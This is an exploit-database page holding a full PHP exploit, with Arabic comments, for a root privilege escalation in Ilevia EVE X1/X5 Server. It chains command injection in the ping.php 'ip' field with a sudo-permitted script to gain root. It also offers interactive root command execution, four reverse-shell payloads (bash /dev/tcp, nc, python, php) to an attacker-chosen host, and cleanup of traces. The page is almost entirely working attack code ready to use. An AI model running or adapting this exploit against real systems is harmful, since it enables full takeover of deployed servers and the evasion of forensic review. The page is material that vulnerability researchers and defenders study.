Share
## https://sploitus.com/exploit?id=PACKETSTORM:212930
=============================================================================================================================================
    | # Title     : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.ilevia.com                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514
    
    [+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden 
                  due to improper sudoers configuration and command injection in the web interface. The vulnerability allows the www-data web user 
    			  to execute arbitrary commands as root without authentication, leading to complete system compromise.
    
    [+]  POC :  * Usage: php ilevia_exploit.php <target_url> <command>
    
    <?php
    /**
     * Ilevia EVE X1/X5 Server Privilege Escalation Exploit
     * CVE-2025-34515 - by indoushka
     */
    
    class IleviaExploit {
        private $target_url;
        private $session;
        
        public function __construct($target_url) {
            $this->target_url = rtrim($target_url, '/');
            $this->session = curl_init();
            curl_setopt_array($this->session, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_TIMEOUT => 30,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
            ]);
        }
        
        private function request($path, $data = [], $method = 'POST') {
            $url = $this->target_url . $path;
            curl_setopt($this->session, CURLOPT_URL, $url);
            
            if ($method === 'POST') {
                curl_setopt($this->session, CURLOPT_POST, true);
                curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data));
            } else {
                curl_setopt($this->session, CURLOPT_POST, false);
                if (!empty($data)) {
                    $url .= '?' . http_build_query($data);
                    curl_setopt($this->session, CURLOPT_URL, $url);
                }
            }
            
            $response = curl_exec($this->session);
            return $response;
        }
        
        /**
         * استخدام ثغرة حقن الأوامر في ping.php لكتابة أمر في السكريبت
         */
        public function injectCommand($command) {
            echo "[*] حقن الأمر في السكريبت...\n";
            
            // تحويل الأمر إلى صيغة آمنة للنص
            $encoded_cmd = base64_encode($command);
            $payload = "echo '#!/bin/bash' > /tmp/exploit.sh && ";
            $payload .= "echo 'echo \"" . addslashes($encoded_cmd) . "\" | base64 -d | bash' >> /tmp/exploit.sh && ";
            $payload .= "chmod +x /tmp/exploit.sh && ";
            $payload .= "echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && ";
            $payload .= "echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh";
            
            $response = $this->request('/ajax/php/ping.php', [
                'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
            ]);
            
            if ($response !== false && trim($response) === '0') {
                echo "[+] تم حقن الأمر بنجاح\n";
                return true;
            }
            
            echo "[-] فشل في حقن الأمر\n";
            return false;
        }
        
        /**
         * تنفيذ السكريبت المعدل باستخدام sudo
         */
        public function executePrivileged() {
            echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n";
            
            $response = $this->request('/ajax/php/ping.php', [
                'ip' => "$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)"
            ]);
            
            if ($response !== false) {
                echo "[+] تم التنفيذ بنجاح\n";
                
                // محاولة قراءة النتيجة
                $result = $this->request('/ajax/php/dbcheck.php', [
                    'db_log' => '/tmp/result.txt'
                ]);
                
                if ($result) {
                    $data = json_decode($result, true);
                    if (isset($data['error'])) {
                        return $data['error'];
                    }
                }
                
                return $response;
            }
            
            return false;
        }
        
        /**
         * تنفيذ أمر مباشر باستخدام السكريبت
         */
        public function executeCommand($command) {
            echo "[*] إعداد وتنفيذ الأمر: $command\n";
            
            // إنشاء سكريبت استغلال مؤقت
            $temp_script = "/tmp/cmd_" . md5(uniqid()) . ".sh";
            $payload = "#!/bin/bash\n";
            $payload .= "echo 'echo \\\"Executing as: \\$(id)\\\"' > $temp_script\n";
            $payload .= "echo '$command' >> $temp_script\n";
            $payload .= "chmod +x $temp_script\n";
            $payload .= "sudo bash $temp_script > /tmp/output.txt 2>&1\n";
            $payload .= "cat /tmp/output.txt";
            
            $response = $this->request('/ajax/php/ping.php', [
                'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
            ]);
            
            // قراءة المخرجات
            $output = $this->request('/ajax/php/dbcheck.php', [
                'db_log' => '/tmp/output.txt'
            ]);
            
            if ($output) {
                $data = json_decode($output, true);
                if (isset($data['error']) && !empty(trim($data['error']))) {
                    return $data['error'];
                }
            }
            
            return $output ?: $response;
        }
        
        /**
         * استغلال مباشر للحصول على shell عكسي
         */
        public function reverseShell($lhost, $lport) {
            echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n";
            
            $payloads = [
                // bash reverse shell
                "bash -i >& /dev/tcp/$lhost/$lport 0>&1",
                // nc reverse shell
                "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f",
                // python reverse shell
                "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
                // php reverse shell
                "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'",
            ];
            
            foreach ($payloads as $i => $payload) {
                echo "[*] محاولة payload #" . ($i+1) . "\n";
                $result = $this->executeCommand($payload);
                
                if ($result !== false) {
                    echo "[+] تم إرسال payload بنجاح\n";
                    echo "[i] استمع على: nc -lvnp $lport\n";
                    return true;
                }
                
                sleep(2);
            }
            
            echo "[-] فشل جميع محاولات reverse shell\n";
            return false;
        }
        
        /**
         * اختبار الاتصال بالهدف
         */
        public function testConnection() {
            echo "[*] اختبار الاتصال بالهدف...\n";
            
            try {
                $response = $this->request('/ajax/php/ping.php', [
                    'ip' => '127.0.0.1'
                ]);
                
                if ($response !== false && trim($response) === '0') {
                    echo "[+] الهدف متاح ويستجيب\n";
                    return true;
                }
            } catch (Exception $e) {
                echo "[-] خطأ في الاتصال: " . $e->getMessage() . "\n";
            }
            
            return false;
        }
        
        /**
         * تنظيف الآثار
         */
        public function cleanup() {
            echo "[*] تنظيف الآثار...\n";
            
            $cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; ";
            $cleanup_cmd .= "sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; ";
            $cleanup_cmd .= "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh";
            
            $this->request('/ajax/php/ping.php', [
                'ip' => "$(bash -c \"" . addslashes($cleanup_cmd) . "\")"
            ]);
            
            echo "[+] تم التنظيف\n";
        }
        
        public function __destruct() {
            curl_close($this->session);
        }
    }
    
    // واجهة سطر الأوامر
    function printBanner() {
        echo "=============================================\n";
        echo "  Ilevia EVE X1/X5 Privilege Escalation Exploit\n";
        echo "         CVE-2025-34515 - by indoushka          \n";
        echo "=============================================\n\n";
    }
    
    function printUsage() {
        echo "الاستخدام:\n";
        echo "  php " . basename(__FILE__) . " <url> [options]\n\n";
        echo "الخيارات:\n";
        echo "  --test          اختبار الاتصال فقط\n";
        echo "  --cmd <command> تنفيذ أمر واحد\n";
        echo "  --shell <ip:port> الحصول على reverse shell\n";
        echo "  --interactive   وضع تفاعلي\n\n";
        echo "أمثلة:\n";
        echo "  php ilevia_exploit.php http://192.168.1.100:8080 --test\n";
        echo "  php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n";
        echo "  php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n";
    }
    
    // التنفيذ الرئيسي
    if (php_sapi_name() !== 'cli') {
        die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n");
    }
    
    if ($argc < 2) {
        printBanner();
        printUsage();
        exit(1);
    }
    
    $target = $argv[1];
    $exploit = new IleviaExploit($target);
    
    printBanner();
    
    // اختبار الاتصال أولاً
    if (!$exploit->testConnection()) {
        echo "[-] الهدف غير متاح\n";
        exit(1);
    }
    
    // معالجة الخيارات
    if ($argc >= 3) {
        switch ($argv[2]) {
            case '--test':
                echo "[+] اختبار الاتصال ناجح\n";
                exit(0);
                
            case '--cmd':
                if ($argc >= 4) {
                    $command = $argv[3];
                    echo "[*] تنفيذ الأمر: $command\n";
                    $result = $exploit->executeCommand($command);
                    if ($result !== false) {
                        echo "\n[+] النتيجة:\n";
                        echo "================================\n";
                        echo $result . "\n";
                        echo "================================\n";
                    } else {
                        echo "[-] فشل التنفيذ\n";
                    }
                }
                break;
                
            case '--shell':
                if ($argc >= 4) {
                    list($lhost, $lport) = explode(':', $argv[3]);
                    $exploit->reverseShell($lhost, $lport);
                }
                break;
                
            case '--interactive':
                echo "[*] الانتقال للوضع التفاعلي\n";
                echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n";
                
                while (true) {
                    echo "ilevia> ";
                    $command = trim(fgets(STDIN));
                    
                    if ($command === 'exit') {
                        break;
                    } elseif ($command === 'clean') {
                        $exploit->cleanup();
                        continue;
                    } elseif (empty($command)) {
                        continue;
                    }
                    
                    $result = $exploit->executeCommand($command);
                    if ($result !== false) {
                        echo "\n" . $result . "\n\n";
                    } else {
                        echo "[-] فشل التنفيذ\n";
                    }
                }
                break;
                
            default:
                printUsage();
                exit(1);
        }
    } else {
        // الوضع الافتراضي: عرض خيارات sudo المتاحة
        echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n";
        $result = $exploit->executeCommand("sudo -l");
        if ($result !== false) {
            echo "\n[+] صلاحيات sudo:\n";
            echo "================================\n";
            echo $result . "\n";
            echo "================================\n";
        }
        
        echo "\n[i] للمزيد من الخيارات، استخدم --help\n";
    }
    
    // تنظيف خفيف في النهاية
    $exploit->cleanup();
    echo "\n[+] انتهى التنفيذ\n";
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================